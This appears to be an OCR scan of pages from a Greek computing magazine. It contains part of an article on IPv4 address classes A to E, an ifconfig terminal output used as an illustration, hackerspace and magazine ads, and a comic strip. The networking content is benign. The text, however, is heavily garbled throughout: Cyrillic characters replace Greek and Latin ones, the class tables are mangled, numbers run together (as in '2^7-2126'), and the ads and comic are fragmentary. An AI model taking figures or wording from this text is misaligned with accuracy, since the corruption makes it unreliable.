τα ἡ τη διεύθυνση µιας συσκευἠς Жеутдс% του δικτύου (host ID ἡ host 
address). Συχνά, η δυσκολία στο «χειρισμὀ» διευθύνσεων IP ἐγκειται 
στη διάκριση του network ID ano το host ID. 


Αρχικἁ, στην προδιαγραφἠ του IP υπήρχε πρὀβλεψη για διαφορετικὲς 
κλάσεις διευθύνσεων (address classes). Με βάση το σχετικὀὸ σύστημα 
ορἰζονται δίκτυα διαφορετικών μεγεθών κι απὀ pia δεδομένη διεύθυνση 
ІР φαἰνεται афеудс για ті μεγέθους δίκτυο μιλάμε, αφετέρου ταυτοποιεἰ- 
ται κι о host εντὸς του δικτύου. Λόγω της εκρηκτικἠς διόγκωσης του Al- 
αδικτύου, φαινόμενο που δεν θα μπορούσε va ἐχει προβλεφθεί απὀ τους 
ooo Фф} cvar — bash — 95x30 — 381 | 
15 Ξ = bash | > | С ΓΝ οσα Ν πε T и 
imac24:- cvar$ ifconfig 
100: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384 
(1) options=3<RXCSUM, TXCSUM> 


inet6 Ғе80::1%100 prefixlen 64 scopeid 0x1 
inet 127.0.0.1 netmask 0хҒҒ000000 
inet6 ::1 prefixlen 128 

41Ғ0: flags=8010<POINTOPOINT,MULTICAST> mtu 1280 

stf0: flags=0<> mtu 1280 

еп0: flags=8963<UP, BROADCAST, SMART, RUNNING, PROMISC,SIMPLEX,MULTICAST> mtu 1500 
options=2b<RXCSUM, TXCSUM, VLAN_HWTAGGING, TSO4> 

(2) ether 00:16:cb:9a:d0:26 
inet 10.20.30.5 netmask 0хҒҒҒҒҒҒ00 broadcast 10.20.30.255 
media: autoselect (1000baseT <full-duplex,flow-control>) 
status: active 

fw0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 
lladdr 00:17:f2:ff:fe:82:1f:ea 
media: autoselect <full-duplex> 
status: inactive 

enl: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 


ether 00:17:f2:9b:ed:24 
(3) inet 10.0.2.1 netmask Oxffffff00 broadcast 10.0.2.255 
inet 169.254.207.161 netmask Oxffff0000 broadcast 169.254.255.255 
media: autoselect 
status: active 
vboxnet0: flags=8843<UP,BROADCAST, RUNNING, SIMPLEX,MULTICAST> mtu 1500 


ether 0a:00:27:00:00:00 
inet 192.168.56.1 netmask Oxffffff00 broadcast 192.168.56.255 
imac24:~ cvar$ 


Πώς δουλεύουν τα δίκτυα 
“0 


σχεδιαστὲς του ІР, το σύστημα των address classes έφτασε γρήγορα ота 
Орай του. Σήμερα χρησιμοποιείται το εναλλακτικὀ, σύγχρονο σύστημα 
των λεγόμενων classless IP addresses. Οφεἰλουµε να κατανοήσουμε 
τη λογική του, όμως για να το κάνουμε εἶναι σκόπιμο να парк λἰγο πίσω 
και να συζητήσουμε για τις παλιές, (OXI και τόσο) καλὲς address classes. 


Κατηγοριοποίηση διευθύνσεων IP: H πρὠτη απὀπειρα! 


Στο πρωτόκολλο IP ορἰζονται πέντε διαφορετικὲς κλάσεις διευθύνσεων: 
οι A, B, C, D ка Е. Στις A, В και C, ο αριθμὸς των octets που αφορούν 
στο network ID διαφέρει, ορίζοντας προφανώς δίκτυα διαφορετικών HE- 
γεθών (λεπτομέρειες σε πολύ λίγο). H κλάση D υπάρχει για τις λεγόμενες 
multicast addresses, που εἶναι διευθύνσεις ειδικού τύπου. H δε κλάση E 
εἶναι πειραµατικἠ και δεν χρησιμοποιείται. Γράφοντας µια διεύθυνση IP 
στο δυαδικὀ σύστημα, τα прота bit апо арістера δείχνουν σε ποια κλά- 
ση ανήκει η εν λόγω διεύθυνση. Αναλυτικότερα, ισχύουν τα ακόλουθα: 


ο αν το прото bit εἶναι 0, τότε η διεύθυνση ανήκει στην κλάση А 


ο αν το πρώτο bit εἶναι 1 και το δεύτερο 0, τότε η διεύθυνση ανήκει 
στην κλάση Β 

ο αν το πρὠτο bit εἶναι 1, το δεύτερο επἰσης 1 και το τρίτο 0, τότε η 
διεύθυνση ανἠκει στην κλάσης 


ο αν τα тріа прота bit εἶναι όλα 1 και το τέταρτο εἶναι 0, τότε η διεύ- 
θυνση ανήκει στην κλάση D 


е αν τα тёсоєра прота bit εἶναι όλα 1, τότε η διεύθυνση ανήκει στην 
κλάση Ε 


Та χαρακτηριστικἁ των κλάσεων A, B και C nou µας ενδιαφέρουν, συνο- 
шібоута! στον ακόλουθο πίνακα: 


Κλάση Μορφή διεύθυνσης Μήκος Πλήθος Πλήθος 
(*=0ñ1) network ID δικτύων hosts 

A за жас eak aka о ас ke жж 8bit 2^7 - 2 = 126 2^24 - 2 = 16777214 

B Тежжжжжжжжжжжжжж | ж Ж kk k kkk k k k k 16bit 2^14 = 16384 2^16 - 2 = 65534 

ς LIQ Aa kak Aak ае ож |жжжж aK 24bit 2^21 = 2097152 2^8 - 2 = 254 


O προηγούμενος піуакас εἶναι ша хара, καλύτερα ὁμως va τον γράψου- 
µε ξανὰ κι αυτή τη фора να šXoUHEz TIG γενικὲς μορφὲς των διευθύνσεων 
σε dotted-decimal: 


Κλάση Μορφή διεύθυνσης Μήκος Πλήθος Πλήθος 
network ID δικτύων hosts 

A 1-126|p.q.r 8bit 127 16777214 

B 128-191.p|q.r 16bit 16384 65534 

с 192-223.p.q|r 24bit 2097152 254 


Οι κάθετες γραμμὲς που εμφανίζονται στις μορφὲς των διευθύνσεων бі- 
αχωρἰζουν το network ID ano το host ID. Тора, επειδἠ το network ID 
δεν μπορεὶ να αποτελεἰται μόνο апо μηδενικἁ, and το συνολικό πλήθος 
των διαφορετικών δικτύων κλάσης А που εἰναι 128 (=2^7) αφαιρούμε 1 
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KI ETO! naipvoupe 127 διαφορετικἀ δίκτυα. Όμως то δίκτυο µε network 
ID то 01111111 (127 στο δεκαδικὀ) εἶναι δεσμευμένο για ειδικἠ χρήση. 
Τελικά, λοιπὸν, το πλήθος των διαφορετικών δικτύων κλάσης А εἶναι 2^7- 
2126. 


Επειδἠ εξάλλου οι διευθύνσεις που ἐχουν το δεξιότερο Octet 00000000 
ñ 1111111111 (255 στο δεκαδικὀ) εἶναι επίσης δεσμευμένες για ειδικἐς 
χρήσεις, ano τα πλήθη των hosts κάθε κλάσης αφαιρούμε To 2. 


Εἰναι ора να συζητήσουμε λίγο για τα χαρακτηριστικἁ των κλάσεων бі- 
ευθύνσεων A, В kal С. Μ΄’ αυτὸν τον τρόπο θα φανούν καλύτερα οι aðu- 
ναμἰες αυτἠς της μεθόδου καθορισμού δικτύων και hosts. 


Διευθύνσεις κλάσης A. Ουσιαστικά, αυτὲς ¿xouv νόημα για πολύ pE- 
γάλα δίκτυα, για την ακρίβεια για δίκτυα που προβλέπεται να ¿xouv εκα- 
τομμύρια υπολογιστές. Σε ολόκληρο το Διαδίκτυο μπορούν να υπάρχουν 
έως και 126 δίκτυα κλάσης A. Προφανώς, Eva µόνο δίκτυο µε χιλιάδες 
--πολλὠ δε μάλλον µε εκατομμύρια-- hosts δεν εἶναι πρακτικό. (Ακόμη 
κι αν υπήρχε, στην πράξη θα σερνόταν.) Το θέμα όμως εἶναι От! όποιος 
οργανισμός παίρνει апо την IANA (Internet Assigned Numbers Authority) 
ἑνα δίκτυο κλάσης A, αυτομάτως δεσμεύει Eva πολύ μεγάλο ποσοστὀ 
διευθύνσεων IP -- Kai To πιθανότερο Eival πως δεν θα тіс χρησιμοποιήσει 
ποτέ! 


Διευθύνσεις κλάσης В. 2” ολὀκληρο το Διαδίκτυο μπορούν να υπάρ- 
χουν 16384 διαφορετικά τέτοια δίκτυα, καθένα ano οποία ἐχει «χωρη- 
τικότητα» 65534 διαφορετικὠν hosts. Ακόμα και μεγάλες εταιρείες εἶναι 
μάλλον απίθανο να xouv Eva µόνο δίκτυο αποτελούμενο апо τόσες XI- 
λιάδες υπολογιστές. Προσέξτε: Το πρόβλημα беу εντοπἰζεται στο πλήθος 
των υπολογιστών алла στο να ανήκουν ὁλοι τους στο ἰδιο δίκτυο. Μπορεὶ 
λοιπὸν τα δίκτυα κλάσης B να εἶναι σαφώς μικρότερα (και περισσότερα) 
ano εκεἰνα της κλάσης A, στην πράξη όμως OUTE κι αυτά εἶναι ευἑλικτα. 
Την ἴδια στιγµή, η παραχώρηση δικτύων κλάσης В апо την IANA συνε- 
Χίζει να συνεπάγεται υπολογίσιµη σπατάλη του συνολικού πλήθους των 
διευθύνσεων 1Ρ. 


Διευθύνσεις κλάσης C. Το πλήθος των διαφορετικών δικτύων αυτής 
της κλάσης εἶναι πάνω апо δύο εκατομμύρια και καθένα τους µπορεί va 
ἐχει ἑως και 254 hosts. Το θέμα ы” αυτά τα δίκτυα εἶναι πως, για тіс σύγ- 
χρονες ανάγκες εταιρειών, Πανεπιστημίων κ.λπ., εἶναι πολὺ μικρὰ! 


H αποτυχία των κλάσεων 


Мета τα προηγούμενα εἶναι νοµίζουµε προφανὲς το γιατὶ η κατηγοριο- 
ποίηση των διευθύνσεων ІР σε τρεις διαφορετικἐς κλάσεις δεν εἶναι η 
καλύτερη δυνατή ιδέα. Πολὺ апла, για τα δεδοµένα του παγκόσμιου Aiad- 
δικτύου, Eva δίκτυο κλάσης A, B ἡ C εἶναι eite άβολα μεγάλο ceite άβολα 
μικρὀ. Μήπως τότε θα ἐπρεπε να κατηγοριοποιηθούν οι διευθύνσεις σε 
περισσότερες απὀ τρεις κλάσεις; 


Όχι. H καλύτερη λύση εἶναι уа εγκαταλείψουμε εντελὼς την ὁποια απὀ- 
πειρα ἐνταξης των διευθύνσεων IP σε κλάσεις. Στο επόμενο άρθρο της 
σειρἁἀς σας καλωσορἰζουµε στον κόσμο των subnets και δείχνουμε, µετα- 
EU ἄλλων, γιατί το λεγόμενο subnetting εἶναι ευλογία για το IPv4! 


Όπως ακριβώς 
μοιραζόμαστε 
τον κώδικά µας, 


> έτσι θέλουμε να 
μοιραστούμε ко! 

— τις Ιδέες ac! 

hock Γιατί λοιπόν να 
QC егѕрасе.ог μην το κάνουμε 
Αμπατιέλου ТІ, Αθήνα ó с. 
πλησίον ΗΣΑΠ Ay. Ελευθέριος опо κοντα; 


Ebooks Python UnitedTransnation 


Unauthorized Hockothons 
Awmn SoftwareFreedomDay 


OpenLibrary MozillaGreece 
Melissi Fedora Hackfests 
Arduino BookCrossing 
Hellug SysAdmin OpenGarden 
OpenData Aeroponics үру 

CreotiveCommons 


Μάθε περισσότερα για To hsgr, το Πρόγραμμα Εκδηλώσεων 
και πως μπορείς και εσύ να συμμετέχεις: роса сосе gr 


НАОКЕК 


Μαρτίου.. 


Στο 


. σοβαρά тора, έχουμε τόσες ενδιαφἑρ 
έχουμε καταφέρει ν΄ αποφασίσουµε! "Оп 


ж γνωρίστε για εκείνο, για т” ἄλλο -- 
αλλά και για το паралло! 


μάθετε πὠς να κάνετε ετούτο κι 
εκείνο κι οπωσδήποτε ауто το 
καινούργιο που κάνει патаүо! 


ουσες протӣоєс για άρθρα που ακόµα δεν 
ως και να ει, θα σας κρατάμε ενήµερους 


και φυσικά μπορείτε να µας λέτε τη γνώμη σας, ano τη fan page του περιοδικού 


(facebook.com/deltahacker) και φυσικά 


OAH THN 
орд ZKEOTOMAI 
AN OA 
KAT AZT PAGE! 
о KOZMO= Το 


aEKEMEPIOY 
TOY 20/2... 


“BL AATO ANO 
MEZA ΞΟ7.. 
IEZ MOY TI 

EKETEZAI. 


ano то site (deltahacker.gr) 


“г 
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“є/млд/ TO PC ТОУ. 
AYTO= EINAI νπ/Θ/Οξ." 


EIMAI о AARHE 
то PC моу. 


Σα ΣΣ 


Tl AEZ.. 
THN AIZOHZH OTI 


/ TEAEIONE! О XPONOZ, 


ZKEOTEZAI TIZ 
ERKPEMOTHTE= NOY 
OEE WA RAEIZEl=, 
ΤΟΥΣ ANOPONOYZ 
TOY AAIKNZ=E=, 
АУТА 70У OEZ 
NA ENANOPOOZEIZ, 
NA 7Ε/Ξ Σε 474/70 
ZE AYTOYZ 

OY TO A=IZOYN.." Д 


WA ПАРО ETHEIA 
=YNaPOMH 
ETO RAPIDSHARE 
м OXI; 


24-07-2072 WWW.LARISGR.COM 


H διαφήμισή σας θα 
μπορούσε να εἶναι εδώ. 


Θα μπορούσε уа "уал και σε κάποια άλλη σελίδα, δηλαδή. 


Αλλά δεν εἰναι. 


Προς το παρόν. 


таған µας = E DOUME өз ΞΕΡΕΤΕ ы 
ξε POUE m ξέρετε ει лыах va κάνετε. 


Μην ντρέπεστε, λοιπόν. 


talk2us@deltahacker.gr 


Εμείς πάντως θα σας μιλήσουμε. (3) 
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